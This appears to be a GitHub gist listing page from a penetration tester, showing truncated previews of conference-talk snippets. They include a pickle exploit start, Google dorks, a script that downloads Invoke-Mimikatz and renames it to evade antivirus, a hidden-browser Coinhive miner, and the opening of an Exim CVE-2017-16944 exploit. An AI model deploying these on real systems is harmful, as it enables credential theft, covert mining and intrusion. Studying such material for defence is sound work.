This is a collection of code snippets used in my Pen Test Hackfest 2018 Presentation
Santhosh Baswa P3t3rp4rk3r
🏠
P3t3rp4rk3r
/ numpyload_exploit.py
Created
January 27, 2019 11:41
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import numpy | |
| from numpy import __version__ | |
| print __version__ | |
| import os | |
| import pickle | |
| class Test(object): | |
| def __init__(self): | |
| self.a = 1 | |
| def __reduce__(self): |
P3t3rp4rk3r
/ 1 - pythons_sinister_secrets.md
Created
December 19, 2018 07:08
— forked from MarkBaggett/1 - pythons_sinister_secrets.md
Come To The Darkside - Pythons Sinister Secrets
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # List of Google Advanced Search Engine Queries/Dorks | |
| _news/news.php?id= | |
| -site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp | |
| !Host=*.* intext:enc_UserPassword=* ext:pcf | |
| ?action= | |
| ?cat= | |
| ?id= | |
| ?intitle:index.of? mp3 artist-name-here | |
| ?intitle:index.of? mp3 name |
P3t3rp4rk3r
/ kerberoast_pws.xz
Last active
November 15, 2018 06:04
— forked from edermi/kerberoast_pws.xz
edermi Kerberoast PW list (XZ format)
This file has been truncated, but you can view the full file.
P3t3rp4rk3r
/ annotations.xml
Created
May 18, 2018 09:32
— forked from Neo23x0/annotations.xml
Sources for APT Groups and Operations Search Engine
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8" ?> | |
| <Annotations start="0" num="138" total="138"> | |
| <Annotation about="*.401trg.pw/*" timestamp="0x00056c69af232729" href="Cg0qLjQwMXRyZy5wdy8qEKnOjPmajdsC"> | |
| <Label name="_cse_turlh5vi4xc" /> | |
| <AdditionalData attribute="original_url" value="https://401trg.pw/" /> | |
| </Annotation> | |
| <Annotation about="decalage.info/en/security*" timestamp="0x00056c678a15c50b" href="ChpkZWNhbGFnZS5pbmZvL2VuL3NlY3VyaXR5KhCLitfQ-IzbAg"> | |
| <Label name="_cse_turlh5vi4xc" /> | |
| <AdditionalData attribute="original_url" value="https://decalage.info/en/security" /> | |
| </Annotation> |
P3t3rp4rk3r
/ invoke_evasion.sh
Created
May 16, 2018 14:52
— forked from PaulSec/invoke_evasion.sh
Small script to bypass AV that triggers Invoke-Mimikatz with shitty rules
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # AV Bypass to run Mimikatz | |
| # From: https://www.blackhillsinfosec.com/?p=5555 | |
| # Server side: | |
| wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | |
| sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 | |
| sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 |
P3t3rp4rk3r
/ Invoke-XMRMiner.ps1
Created
January 16, 2018 09:18
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-XMRWebMiner { | |
| <#-- | |
| FOR EDUCATIONAL PURPOSES ONLY | |
| Will start a hidden Internet Explorer window and mine through coinhive in the background. | |
| --#> | |
| $ie=New-Object -comobject InternetExplorer.Application | |
| $ie.visible = $False | |
| $ie.Silent = $true | |
| $ie.navigate('https://authedmine.com/media/miner.html?key=<enter your coinhive key>') | |
| while($ie.busy){Start-Sleep 3} |
P3t3rp4rk3r
/ xml-attacks.md
Created
December 8, 2017 21:08
— forked from mgeeky/xml-attacks.md
XML Vulnerabilities and Attacks cheatsheet
XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.
The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.
P3t3rp4rk3r
/ yara_performance_guidelines.md
Created
December 1, 2017 05:03
— forked from Neo23x0/yara_performance_guidelines.md
YARA Performance Guidelines
When creating your rules for YARA keep in mind the following guidelines in order to get the best performance from them. This guide is based on ideas and recommendations by Victor M. Alvarez and WXS.
- Revision 1.1, February 2016, applies to all YARA version 3.3+
Global rules are evaluated first. Only if they are satisfied non-global rules are evaluated. This may be useful if all samples exhibit the same characteristics. Use them combined with the "private" statement to suppress a match notification on the global rules.
P3t3rp4rk3r
/ CVE-2017-16944 #Exim #Mail #RCE
Created
November 27, 2017 08:27
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # CVE-2017-16944 (Associated: CVE-2017-16943) | |
| # | |
| # pip install pwntools | |
| from pwn import * | |
| r = remote('localhost', 25) | |
| r.recvline() |